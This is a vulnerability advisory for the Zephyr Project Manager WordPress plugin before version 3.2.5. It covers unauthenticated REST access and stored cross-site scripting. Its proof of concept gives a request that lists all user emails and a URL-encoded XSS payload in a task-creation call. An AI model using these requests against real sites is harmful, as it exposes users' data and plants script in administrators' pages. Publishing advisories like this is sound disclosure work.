WordPress Plugin Vulnerabilities

Zephyr Project Manager < 3.2.5 - Unauthorised REST Calls to Stored XSS

Description

The plugin does not have proper authorisation (even when the Require Authorisation for REST API Requests is enabled) in all its REST endpoints, allowing unauthenticated users to call them either directly. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins

Proof of Concept

Get all users email addresses: http://example.com/wp-json/zephyr_project_manager/v1/users

http://example.com/wp-json/zephyr_project_manager/v1/tasks/create/?name=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f

The XSS will be trigged when viewing a list where the tasks is displayed, for example All Tasks at /wp-admin/admin.php?page=zephyr_project_manager_tasks

Affects Plugins

Plugin icon
zephyr-project-manager
Fixed in 3.2.5

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.3 (high)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed

Timeline

Publicly Published
2022-08-29 (about 1 years ago)
Added
2022-08-29 (about 1 years ago)
Last Updated
2022-08-29 (about 1 years ago)

Other

Published
Title
Published
2023-07-26
Title
AGP Font Awesome Collection <= 3.2.4 - Reflected XSS
Published
2024-04-16
Title
Import Content in WordPress & WooCommerce with Excel < 4.3 - Reflected Cross-Site Scripting
Published
2018-01-12
Title
Booking Calendar <= 2.1.7 - Authenticated Stored XSS & CSRF
Published
2024-01-23
Title
WordPress Button Plugin MaxButtons < 9.7.7 - Contributor+ Stored XSS
Published
2024-03-18
Title
Passwordless Login < 1.1.3 - Authenticated (Subscriber+) Stored Cross-Site Scripting